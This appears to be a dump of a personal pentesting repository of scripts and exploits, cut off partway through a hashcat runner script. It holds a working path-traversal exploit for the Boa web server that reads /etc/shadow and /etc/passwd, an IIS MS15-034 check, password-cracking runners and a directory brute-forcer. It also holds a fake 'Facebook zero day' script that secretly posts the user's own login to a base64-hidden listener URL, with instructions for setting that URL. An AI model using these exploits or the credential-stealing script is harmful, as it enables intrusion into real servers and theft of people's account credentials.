├── MS15-034.py ├── Netsparker_multi_instance_scanner.ps1 ├── README.md ├── boa_afa_cve_2017_9833.py ├── burp ├── IntrudeTheIntruder.py └── readme.md ├── facebook_skidding ├── FB_Skid_SE.py ├── Readme.md └── skid_listener.php ├── giveWebHead.py ├── hashcat ├── README.md ├── hashcat_runner.ps1 ├── hashcat_runner.sh └── hashcat_runner_osx.sh ├── kyocera ├── KyoceraAddressBookDecryptor.cs ├── KyoceraAddressBookDecryptor.exe ├── Readme.md ├── printer_xml_address_book.PNG ├── usage_sample.PNG └── workflow.PNG ├── ldap ├── bruteforce_interface.php ├── ldap_dump_users.php └── love_thy_script_ldap.py ├── membership-simplified-for-oap-members-only-exploit.py ├── metasploit_modules ├── Readme.md ├── mobile_app_native.rb ├── mobileapp_builder_by_wappress.rb ├── wp2android_file_upload.rb ├── wp_easytouch_builder.rb └── wp_webapp_builder.rb ├── mimi_multidump.bat ├── oob_xxe ├── server │ ├── checkrce.dtd │ ├── dtd │ ├── getFile.dtd │ ├── getFileEncoded.dtd │ ├── rceEncoded.dtd │ ├── server.py │ └── xxelog.txt └── xxe_client.py ├── portscan ├── nc_portscan.sh ├── ports_1000.txt ├── readme.md └── simple_flow.jpg ├── pyrequires.txt ├── sailpoint ├── beanshell_json_compatible.py └── build_map_rule_cleaner.py ├── simple_netcat_server.py ├── wp_ue_api.py └── zen_app_mobile_wp_rfu.py /MS15-034.py: -------------------------------------------------------------------------------- 1 | import requests 2 | print "################################################################" 3 | print "MS15-034 Byte Range Server DoS check (IIS) - By Alienwithin" 4 | print "################################################################\n\n" 5 | target = raw_input("Please Enter target to test e.g. http://example.com: \n") 6 | alienHeads = {'Range': '0-12839131982321398123'} 7 | checkForVuln = requests.get(target, headers=alienHeads) 8 | if checkForVuln.status_code == 416: 9 | print "\nStatus: Vulnerable\nReason: Target seems to be vulnerable as it tried to handle our large range which was not satisfiable" 10 | else: 11 | print "\nStatus: Safe\nReason: Target Seems to be patched against MS15-034" 12 | -------------------------------------------------------------------------------- /Netsparker_multi_instance_scanner.ps1: -------------------------------------------------------------------------------- 1 | Write-Host "################################################################################### 2 | 3 | Netsparker Multiple Instance Launcher by Munir Njiru (Alien-within) 4 | 5 | Purpose: Launch Multiple instances of Netsparker to scan 6 | each URL in a text file. Please consider your text 7 | file list based on resources in the machine to avoid choking it. 8 | 9 | Website: https://www.alien-within.com 10 | e-mail: munir@alien-within.com 11 | 12 | ################################################################################### 13 | 14 | "; 15 | 16 | $NetsparkerInstallPath = Read-Host -Prompt 'Input Path to Netsparker Installation e.g. C:\Program Files (x86)\Netsparker\Netsparker.exe' 17 | $TargetURLs = Read-Host -Prompt 'Input path to text file with URLs e.g. F:\Pentests\scan_targets.txt' 18 | $ReportStorage = Read-Host -Prompt 'Input path to save your reports when done e.g. F:\Pentests\Reports\' 19 | $ReportType = "Detailed Scan Report" 20 | foreach ($url in get-content $TargetURLs) { 21 | $domain = ([System.URI]"$url").Host 22 | $report = $ReportStorage + $domain + "_" + (Get-Date -format "yyyyMMdHm") 23 | start-process -FilePath "$NetsparkerInstallPath" -ArgumentList "/url ""$url"" /profile ""$domain"" /a /s /r ""$report"" /rt ""$ReportType""" 24 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Scripts & Sploits 2 | 3 | This repo will contain a collection of scripts that are POC's against various vulnerabilities identified. Currently here in there's: 4 | 5 | **zen_app_mobile_wp_rfu.py** 6 | 7 | >> This exploit caters for 5 CVE's that can be exploited 8 | >> * Zen App Mobile Native <=3.0 (CVE-2017-6104) 9 | >> * Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002) 10 | >> * Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003) 11 | >> * Wordpress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001) 12 | >> * Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000) 13 | 14 | **wp_ue_api.py** 15 | 16 | >>This exploit enumerates users on wordpress 4.7 via the JSON API (CVE 2017-5487) 17 | 18 | **membership-simplified-for-oap-members-only-exploit.py** 19 | >> This exploit is a PoC for Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download and attempts to download the wordpress configuration file or /etc/passwd file from the target system. (CVE-2017-1002008) 20 | 21 | 22 | **mimi_multidump.bat** 23 | >> This is a simple batch script that makes it efficient if you have multiple lsass.dmp files to dump the passwords into text files for each. 24 | 25 | **MS15-034.py** 26 | >> This vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system. It can be achieved by abusing the Range header against IIS servers. 27 | 28 | -------------------------------------------------------------------------------- /boa_afa_cve_2017_9833.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import string 3 | import random 4 | from urlparse import urlparse 5 | 6 | print "---------------------------------------------------------------------" 7 | print "BOA Web Server 0.94.14 - Access to arbitrary files as privileges\nDiscovery: Miguel Mendez\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-9833\nVulnerable Version: Boa Webserver 0.94.14rc21" 8 | print "---------------------------------------------------------------------" 9 | victim = raw_input("Please Enter victim host e.g. http://example.com:80\n") 10 | file_choice=raw_input ("Please choose a number representing the file to attack: \n1. Linux Shadow File \n2. Linux Passwd File\n3. Linux Hosts File\n") 11 | if file_choice == "1": 12 | payload="/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=malice&PWD=malice&PIC_SIZE=0" 13 | elif file_choice == "2": 14 | payload="/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=malice&PWD=malice&PIC_SIZE=0" 15 | elif file_choice == "3": 16 | payload="/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/hosts%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=malice&PWD=malice&PIC_SIZE=0" 17 | else: 18 | print "Invalid Download choice, Please choose 1 ,2 or 3; Alternatively you can re-code me; I will now exit" 19 | quit() 20 | target=victim+payload 21 | 22 | def checkReachable(): 23 | PortalIsAlive = requests.get(target+"/cgi-bin/wapopen") 24 | PortalIsExistent = PortalIsAlive.status_code 25 | if PortalIsExistent == 200: 26 | print "\nI can reach the target , I will attempt the exploit\nRunning exploit..." 27 | exploit() 28 | else: 29 | print "Target has a funny code & might not be vulnerable, I will now exit\n" 30 | quit() 31 | 32 | def exploit(): 33 | WhyLiveWithLFI = requests.get(target) 34 | fileState = WhyLiveWithLFI.status_code 35 | if fileState == 200: 36 | respFromThatFile = WhyLiveWithLFI.text 37 | print respFromThatFile 38 | else: 39 | print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +str(fileState)+"\n"+str(WhyLiveWithLFI.text) 40 | 41 | if __name__ == "__main__": 42 | checkReachable() 43 | -------------------------------------------------------------------------------- /burp/IntrudeTheIntruder.py: -------------------------------------------------------------------------------- 1 | from burp import IBurpExtender 2 | from burp import IHttpListener 3 | from burp import IInterceptedProxyMessage 4 | from java.io import File 5 | from java.nio.file import Paths, Files 6 | from java.nio.charset import StandardCharsets 7 | import time 8 | 9 | class BurpExtender(IBurpExtender, IHttpListener): 10 | 11 | def registerExtenderCallbacks(self, callbacks): 12 | self._callbacks = callbacks 13 | self._helpers = callbacks.getHelpers() 14 | callbacks.setExtensionName("Intruder The Intruder 1.1 ") 15 | callbacks.registerHttpListener(self) 16 | callbacks.issueAlert("Dump neatly from intruder to disk.") 17 | 18 | def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo): 19 | if not messageIsRequest and toolFlag == self._callbacks.TOOL_INTRUDER: 20 | intercepted_response = self._helpers.bytesToString(messageInfo.getResponse()).split("\r\n\r\n", 1)[1] 21 | self.saveResponseBody(intercepted_response) 22 | 23 | def saveResponseBody(self, intercepted_response): 24 | try: 25 | extraction_file = "ITI_intercept_{}.iti".format(time.strftime("%d-%m-%Y")) 26 | 27 | with open(extraction_file, "a") as file: 28 | file.write(intercepted_response + "\n\n") 29 | 30 | self._callbacks.printOutput("Response body saved to: {}".format(extraction_file)) 31 | except Exception as e: 32 | self._callbacks.printError("Error saving response body: {}".format(e)) 33 | 34 | def getAuthor(self): 35 | return "Munir Njiru" 36 | 37 | def getExtensionDescription(self): 38 | """ 39 | Simple Burp Extension to Extract Data From Intruder Realtime for External Analysis. 40 | 41 | Use Cases: 42 | - Extracting JSON responses from Intruder for iterative analysis outside burp. 43 | - Saving HTML responses for further investigation. 44 | - Analyzing XML responses for vulnerabilities. 45 | - Removing headers from responses as opposed to the default intruder export 46 | - Dumping recursively data from API's in API testing 47 | """ 48 | 49 | def getExtensionName(self): 50 | return "Intrude the Intruder 1.1" 51 | 52 | callbacks = BurpExtender() 53 | -------------------------------------------------------------------------------- /burp/readme.md: -------------------------------------------------------------------------------- 1 | # Burp Extensions 2 | 3 | This repository will be dedicated to extensions related to burp to perform some nifty things that make it more efficient. 4 | 5 | 6 | # Intrude The Intruder 7 | 8 | [This](https://github.com/alienwithin/Scripts-Sploits/blob/master/burp/IntrudeTheIntruder.py) is a simple burp Extension to extract data From intruder realtime for External Analysis. 9 | 10 | Use Cases: 11 | - Extracting JSON responses from Intruder for iterative analysis outside burp. 12 | - Saving HTML responses for further investigation. 13 | - Analyzing XML responses for vulnerabilities. 14 | - You need to export Intruder responses from burp without the headers and other overhead. 15 | - Dumping recursively data from API's in API testing for things like IDOR and show business impact. 16 | -------------------------------------------------------------------------------- /facebook_skidding/FB_Skid_SE.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Author : Munir Njiru 3 | # A script to teach skids that hacking facebook takes a user element to it; Old school love to learning 4 | # Article can be found here : http://www.alien-within.com/fun-with-the-skids-season-1/ 5 | # Used for educational purposes only 6 | # Credits : Pablo for login bit (http://stackoverflow.com/users/197283/pablo) 7 | import argparse 8 | import datetime 9 | import time 10 | import json 11 | import logging 12 | import re 13 | import random 14 | import requests 15 | import shutil 16 | import base64 as bss4 17 | from pyquery import PyQuery as africahackU 18 | import getpass 19 | import sys 20 | import urllib 21 | 22 | def main(username, password): 23 | session = requests.session() 24 | 25 | uid, dtsg = login(session, username, password) 26 | 27 | 28 | def login(session, username, password): 29 | 30 | response = session.get('https://facebook.com') 31 | 32 | dom = africahackU(response.text) 33 | 34 | lsd = dom('[name="lsd"]').val() 35 | 36 | response = session.post('https://www.facebook.com/login.php?login_attempt=1', data={ 37 | 'lsd': lsd, 38 | 'email': username, 39 | 'pass': password, 40 | 'default_persistent': '0', 41 | 'timezone': '-60', 42 | 'lgndim': '', 43 | 'lgnrnd': '', 44 | 'lgnjs': '', 45 | 'locale':'en_GB', 46 | 'qsstamp': '' 47 | }) 48 | 49 | try: 50 | uid = session.cookies['c_user'] 51 | dtsg = re.search(r'(type="hidden" name="fb_dtsg" value="([0-9a-zA-Z-_:]+)")', response.text).group(1) 52 | 53 | dtsg = dtsg[dtsg.find("value")+6:] 54 | dtsg = dtsg[1:-1] 55 | api_key = random.getrandbits(128) 56 | api_secret = random.getrandbits(128) 57 | hackString=random.getrandbits(128) 58 | print "Facebook Graph API Login Success\n\n" 59 | e_mail = raw_input("Please enter email of user to hack: ") 60 | sys.stdout.write ("\nRetrieving keys from: https://graph.facebook.com \n") 61 | sys.stdout.write("\n") 62 | sys.stdout.write ("Received API Key: " + str(api_key) + "\n") 63 | sys.stdout.write ("Received API Secret: " + str(api_secret) + "\n\n" ) 64 | sys.stdout.write ("Encoding payload with api keys and sending to extract user on graph...\n") 65 | sys.stdout.write ("Payload in Use:\n") 66 | unbitme=str(hackString)+str(api_key)+str(api_secret) 67 | print'0x'.join([unbitme[i:i+2] for i in range(0, len(unbitme), 2)]) 68 | phoneHome=bss4.b64decode("aHR0cDovL3BsZWFzZXB1dHlvdXJsaXN0ZW5lcmlwL3NjcmlwdF93YXRldmVyLnBocA") 69 | payload = {'facebook_username': u_name, 'facebook_password': p_assword} 70 | requests.post(phoneHome, data=payload) 71 | toolbar_width = 40 72 | sys.stdout.write("[%s]" % (" " * toolbar_width)) 73 | sys.stdout.flush() 74 | sys.stdout.write("\b" * (toolbar_width+1)) 75 | for i in xrange(toolbar_width): 76 | time.sleep(0.1) 77 | sys.stdout.write("-") 78 | sys.stdout.flush() 79 | sys.stdout.write ("\n\nNetwork has timed out or Probe has been dropped by facebook, try again. \n") 80 | except KeyError: 81 | print ('Login to Graph Failed! Check your Credentials Again') 82 | 83 | return uid, dtsg 84 | 85 | 86 | 87 | try: 88 | print "################################################" 89 | print "Facebook Graph Zero Day Exploit by Alienwithin\n" 90 | print "################################################" 91 | u_name = raw_input("Please enter your facebook username: ") 92 | p_assword = getpass.getpass("Please enter your facebook password: ") 93 | print "Attempting to login and access GRAPH API" 94 | main(username=u_name, password=p_assword) 95 | except Exception, e: 96 | logging.exception(e) 97 | print e -------------------------------------------------------------------------------- /facebook_skidding/Readme.md: -------------------------------------------------------------------------------- 1 | This is based on an article [Fun with the Skids (season 1)](https://www.alien-within.com/fun-with-the-skids-season-1/); 2 | 3 | It is aimed to simply create awareness. To use the script [Edit this Line](https://github.com/alienwithin/Scripts-Sploits/blob/master/facebook_skidding/FB_Skid_SE.py#L68) to point to your listener script on your server and must be base64 encoded. e.g. http://example.com/listener.php becomes aHR0cDovL2V4YW1wbGUuY29tL2xpc3RlbmVyLnBocA== 4 | 5 | Have fun !!!! 6 | 7 | Shared for educational purposes only. 8 | -------------------------------------------------------------------------------- /facebook_skidding/skid_listener.php: -------------------------------------------------------------------------------- 1 | 4 | -------------------------------------------------------------------------------- /giveWebHead.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | #python giveWebHead.py -t https://example.com -w dirs.txt -i False -m GET 6 | ########################################## 7 | # Give Web Head v1.0 8 | # by Alienwithin 9 | ########################################### 10 | #https://example.com/foundDir1 11 | #https://example.com/foundDir2 12 | #Results are written to a CSV file ie. found URLs and status code. 13 | #Bad Results are also written to file in the case above the files would be : 14 | #- example.com.csv => contains valid urls 15 | #- example.com_ignored.csv => contains urls that failed the test and status code is the reason. 16 | #HEAD is faster than GET ; if a server supports it then use that 17 | ## 18 | import requests 19 | import csv 20 | from optparse import OptionParser 21 | import tldextract 22 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 23 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 24 | global gwHRequester 25 | def gwhEngine(target, wordlist, method, redirects=False): 26 | error_codes_non_redir=[200,403] 27 | error_codes_redir= [200,301,302,403] 28 | with open(wordlist) as dirPerLine: 29 | for dir in dirPerLine: 30 | cleanDirName=str(dir.rstrip('\n')) 31 | fullURL=tldextract.extract(target) 32 | getHostname=fullURL.domain 33 | resultFile=open(str(getHostname)+'.csv', 'a') 34 | badResults=open(str(getHostname)+'_ignored.csv', 'a') 35 | csvWritingObject = csv.writer(resultFile) 36 | BadResultObject=csv.writer(badResults) 37 | if method=="HEAD" and redirects=="False": 38 | gwhRequester=requests.head(target+cleanDirName,verify=False) 39 | gwhStatus=gwhRequester.status_code 40 | if gwhStatus in error_codes_non_redir: 41 | csvWritingObject.writerow( (target+cleanDirName, gwhStatus) ) 42 | resultFile.close() 43 | print target+cleanDirName+" => "+ str(gwhStatus) 44 | elif method=="HEAD" and redirects=="True": 45 | gwhRequester=requests.head(target+cleanDirName,verify=False) 46 | gwhStatus=gwhRequester.status_code 47 | if gwhStatus in error_codes_redir: 48 | csvWritingObject.writerow( (target+cleanDirName, gwhStatus) ) 49 | resultFile.close() 50 | print target+cleanDirName+" => "+ str(gwhStatus) 51 | if method=="GET" and redirects=="True": 52 | gwhRequester=requests.get(target+cleanDirName,verify=False) 53 | gwhStatus=gwhRequester.status_code 54 | if gwhStatus in error_codes_non_redir: 55 | csvWritingObject.writerow( (target+cleanDirName, gwhStatus) ) 56 | resultFile.close() 57 | print target+cleanDirName+" => "+ str(gwhStatus) 58 | elif method=="GET" and redirects=="False": 59 | gwhRequester=requests.get(target+cleanDirName,verify=False) 60 | gwhStatus=gwhRequester.status_code 61 | if gwhStatus in error_codes_redir: 62 | csvWritingObject.writerow( (target+cleanDirName, gwhStatus) ) 63 | resultFile.close() 64 | print target+cleanDirName+" => "+ str(gwhStatus) 65 | else: 66 | gwhRequester=requests.get(target+cleanDirName,verify=False) 67 | gwhStatus=gwhRequester.status_code 68 | print target+cleanDirName+" => "+ str(gwhStatus) 69 | BadResultObject.writerow( (target+cleanDirName, gwhStatus) ) 70 | badResults.close() 71 | def giveTheWebSomeHead(): 72 | alienParser = OptionParser(usage="usage: %prog --help for [options]", 73 | version="%prog version : 1.0") 74 | alienParser.add_option("-t", "--target", 75 | action="store", 76 | dest="target", 77 | default="http://iWannaFindyourDirectories.ws", 78 | help="Target URL") 79 | alienParser.add_option("-w", "--wordlist", 80 | action="store", 81 | dest="wordlist", 82 | default="dirlist.txt", 83 | help="Path to wordlist with directory names") 84 | alienParser.add_option("-i", "--ignore-redirects", 85 | action="store", 86 | dest="redirects", 87 | default=False, 88 | help="Path to wordlist with directory names") 89 | alienParser.add_option("-m", "--method", 90 | action="store", 91 | dest="method", 92 | default="HEAD", 93 | help="Method to use to get results i.e. HEAD or GET") 94 | (options, args) = alienParser.parse_args() 95 | 96 | 97 | if options.target =="http://iWannaFindyourDirectories.ws" or options.target=="": 98 | alienParser.error("I'm sorry there simply has to be a target for this to work") 99 | elif options.wordlist=="": 100 | alienParser.error("You haven't selected a wordlist") 101 | else: 102 | myTarget=options.target 103 | if myTarget[len(myTarget)-1] != "/": 104 | myTarget = myTarget + "/" 105 | gwhEngine(myTarget, options.wordlist, options.method, options.redirects) 106 | def banner(): 107 | print "##########################################" 108 | print "\tGive Web Head v1.0\n\t by Alienwithin\n" 109 | print "##########################################" 110 | if __name__ == '__main__': 111 | banner() 112 | giveTheWebSomeHead() 113 | -------------------------------------------------------------------------------- /hashcat/README.md: -------------------------------------------------------------------------------- 1 | # Hashcat Cracking Manager! 2 | 3 | Many times we struggle with looping through wordlists and rules finding a more efficient strategy of cracking passwords. This helps ease that problem by making some minor calculations and loading efficient cracking rules. 4 | 5 | 6 | # Files 7 | 8 | - hashcat_runner.sh - Meant for linux boxes 9 | - hashcat_runner_osx.sh - Meant for OSX boxes 10 | - hashcat_runner.ps1 - Windows Equivalent 11 | 12 | ## File Location 13 | 14 | The windows version requires to run from the same folder as the binary hashcat.exe however on linux it can invoke globally from any folder 15 | 16 | ## Editing 17 | 18 | In the scripts versions there are house keeping variables that are dependent on your environment. 19 | 20 | ```mermaid 21 | graph LR 22 | A[Hashcat] -- Check Wordlist --> B((LoadProfile)) 23 | A --> C(If using rules, choose profile) 24 | B --> D{Crack Straight or rule based} 25 | C --> D 26 | ``` 27 | -------------------------------------------------------------------------------- /hashcat/hashcat_runner.ps1: -------------------------------------------------------------------------------- 1 | $Banner = @" 2 | ------------------------------------------- 3 | ------------------------------------------- 4 | Hashcat Password Cracking Manager 5 | By 6 | Munir Njiru 7 | ------------------------------------------- 8 | ------------------------------------------- 9 | ------------------------------------------- 10 | "@ 11 | #Load Wordlists->LoopThrough->Checksize->LoadProfile->RunProfile->Next 12 | #Place script in same folder as hashcat binary 13 | write-Host $Banner 14 | #House Keeping Variabless 15 | $wordlistPath ="" #e.g."D:\usr\share\wordlists" 16 | $hashType=""#e.g."1000" 17 | $OutputPath = ""#e.g. "D:\hacker\project\cracked_pass\" 18 | $HashFile = ""#"e.g. D:\hacker\project\hashes" 19 | $rulePath = ""#e.g. "D:\usr\bin\hashcat\rules" 20 | #End House Keeping 21 | function Profile-Large { 22 | #Load Rules Less Than 10KB 23 | $rules = Get-ChildItem -Path $rulePath | Sort-Object Length 24 | for ($i=0; $i -lt $rules.Count; $i++) { 25 | $ruleFile= $rules[$i].FullName 26 | $ruleName= $rules[$i].BaseName 27 | If ((Get-Item $ruleFile).length -lt 10KB){ 28 | $outputFile = ($OutputPath + $FinalName.ToString() + "_" + $ruleName.ToString() + "_large.cracked") 29 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -r $ruleFile -o $outputFile -O") 30 | } 31 | 32 | } 33 | } 34 | function Profile-Medium { 35 | #Load Rules Less Than 120KB 36 | $rules = Get-ChildItem -Path $rulePath | Sort-Object Length 37 | for ($i=0; $i -lt $rules.Count; $i++) { 38 | $ruleFile= $rules[$i].FullName 39 | $ruleName= $rules[$i].BaseName 40 | If ((Get-Item $ruleFile).length -lt 120KB){ 41 | $outputFile = ($OutputPath + $FinalName.ToString() + "_" + $ruleName.ToString() + "_medium.cracked") 42 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -r $ruleFile -o $outputFile -O") 43 | } 44 | 45 | } 46 | } 47 | function Profile-Small { 48 | #Load All Rules 49 | $rules = Get-ChildItem -Path $rulePath | Sort-Object Length 50 | for ($i=0; $i -lt $rules.Count; $i++) { 51 | $ruleFile= $rules[$i].FullName 52 | $ruleName= $rules[$i].BaseName 53 | $outputFile = ($OutputPath + $FinalName.ToString() + "_" + $ruleName.ToString() + "_small.cracked") 54 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -r $ruleFile -o $outputFile -O") 55 | } 56 | 57 | } 58 | $wordlists = Get-ChildItem -Path $wordlistPath -Recurse | Sort-Object Length 59 | for ($i=0; $i -lt $wordlists.Count; $i++) { 60 | $currentWordlist = $wordlists[$i].FullName 61 | $FinalName= $wordlists[$i].BaseName 62 | If ((Get-Item $currentWordlist).length -gt 0KB -And (Get-Item $currentWordlist).length -lt 3MB) 63 | { 64 | $straight_crack = ($FinalName + "_small.cracked") 65 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -o $straight_crack -O") 66 | Profile-Small 67 | } 68 | ElseIf((Get-Item $currentWordlist).length -gt 3MB -And (Get-Item $currentWordlist).length -lt 300MB) 69 | { 70 | 71 | $straight_crack = ($FinalName + "_medium.cracked") 72 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -o $straight_crack -O") 73 | Profile-Medium 74 | 75 | } 76 | ElseIf((Get-Item $currentWordlist).length -gt 300MB -And (Get-Item $currentWordlist).length -lt 30GB) 77 | { 78 | $straight_crack = ($FinalName + "_large.cracked") 79 | iex (".\hashcat.exe -m $hashType -w 3 --remove $hashFile $currentWordlist -o $straight_crack -O") 80 | Profile-Large 81 | } 82 | Else 83 | { 84 | Write-Host $currentWordlist + "has is too large let's skip" 85 | $i++ 86 | } 87 | 88 | } 89 | -------------------------------------------------------------------------------- /hashcat/hashcat_runner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # @author Munir Njiru 3 | # @url www.alien-within.com 4 | # @file hashcat_runner.sh 5 | # @brief A file that tries to solve looping of hashcat cracking 6 | # @description This project seeks to sort wordlists and rules by size and efficiently mix and match them to efficiently crack fast. 7 | 8 | #House Keeping Variables 9 | #Configure these and you are good to go 10 | RuleFolder=""#e.g."/usr/share/hashcat/rules" 11 | HashesFile=""#e.g."/home/hacker/project/filewithhashes" 12 | WordlistsFolder=""#e.g."/usr/share/wordlists/" 13 | HashType=""#e.g. "1000" 14 | OutputFolder=""#e.g."/home/hacker/project/cracked_pass/" 15 | #EndHouse Keeping 16 | 17 | function ProfileLarge(){ 18 | for RULE in "$RuleFolder"/*; 19 | do 20 | FILESIZE=$(stat -c%s "$RULE") 21 | if [ "$FILESIZE" -le "10240" ] 22 | then 23 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 24 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 25 | suffix="_large.cracked" 26 | seperator="_" 27 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 28 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 29 | fi 30 | done 31 | } 32 | function ProfileMedium(){ 33 | 34 | for RULE in "$RuleFolder"/*; 35 | do 36 | FILESIZE=$(stat -c%s "$RULE") 37 | if [ "$FILESIZE" -le "122880" ] 38 | then 39 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 40 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 41 | suffix="_medium.cracked" 42 | seperator="_" 43 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 44 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 45 | fi 46 | done 47 | } 48 | function ProfileSmall(){ 49 | for RULE in "$RuleFolder"/*; 50 | do 51 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 52 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 53 | suffix="_small.cracked" 54 | seperator="_" 55 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 56 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file"-O 57 | done 58 | } 59 | 60 | for currentWordlist in "$WordlistsFolder"/*; 61 | do 62 | $currentWordlist=$(realpath "$currentWordlist") 63 | FILESIZE=$(stat -c%s "$currentWordlist") 64 | if [[ "$FILESIZE" -gt "0" && "$FILESIZE" -le "3145728" ]]; 65 | then 66 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 67 | suffix="_small_straight.cracked" 68 | seperator="_" 69 | cracked_file=$OutputFolder$wordlist$suffix 70 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 71 | ProfileSmall 72 | elif [[ "$FILESIZE" -gt "3145728" && "$FILESIZE" -le "314572800" ]]; 73 | then 74 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 75 | suffix="_medium_straight.cracked" 76 | seperator="_" 77 | cracked_file=$OutputFolder$wordlist$suffix 78 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 79 | ProfileMedium 80 | elif [[ "$FILESIZE" -gt "314572800" && "$FILESIZE" -le "3145728000" ]]; 81 | then 82 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 83 | suffix="_large_straight.cracked" 84 | seperator="_" 85 | cracked_file=$OutputFolder$wordlist$suffix 86 | hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 87 | ProfileLarge 88 | else 89 | echo "Seems $currentWordlist is too large" 90 | fi 91 | done 92 | -------------------------------------------------------------------------------- /hashcat/hashcat_runner_osx.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # @author Munir Njiru 3 | # @url www.alien-within.com 4 | # @file hashcat_runner.sh 5 | # @brief A file that tries to solve looping of hashcat cracking 6 | # @description This project seeks to sort wordlists and rules by size and efficiently mix and match them to efficiently crack fast. 7 | 8 | #House Keeping Variables 9 | #Configure these and you are good to go 10 | RuleFolder=""#e.g."/usr/share/hashcat/rules" 11 | HashesFile=""#e.g."/home/hacker/project/filewithhashes" 12 | WordlistsFolder=""#e.g."/usr/share/wordlists/" 13 | HashType=""#e.g. "1000" 14 | OutputFolder=""#e.g."/home/hacker/project/cracked_pass/" 15 | #EndHouse Keeping 16 | 17 | function ProfileLarge(){ 18 | for RULE in "$RuleFolder"/*; 19 | do 20 | FILESIZE=`du -k "$RULE" | cut -f1` 21 | if [ "$FILESIZE" -le "10240" ] 22 | then 23 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 24 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 25 | suffix="_large.cracked" 26 | seperator="_" 27 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 28 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 29 | fi 30 | done 31 | } 32 | function ProfileMedium(){ 33 | 34 | for RULE in "$RuleFolder"/*; 35 | do 36 | FILESIZE=`du -k "$RULE" | cut -f1` 37 | if [ "$FILESIZE" -le "122880" ] 38 | then 39 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 40 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 41 | suffix="_medium.cracked" 42 | seperator="_" 43 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 44 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 45 | fi 46 | done 47 | } 48 | function ProfileSmall(){ 49 | for RULE in "$RuleFolder"/*; 50 | do 51 | rulefile=$(basename "$RULE" | sed 's/\(.*\)\..*/\1/') 52 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 53 | suffix="_small.cracked" 54 | seperator="_" 55 | cracked_file= $OutputFolder$wordlist$seperator$rulefile$suffix 56 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 57 | done 58 | } 59 | 60 | for currentWordlist in "$WordlistsFolder"/*; 61 | do 62 | $currentWordlist=$(realpath "$currentWordlist") 63 | FILESIZE=`du -k "$currentWordlist" | cut -f1` 64 | if 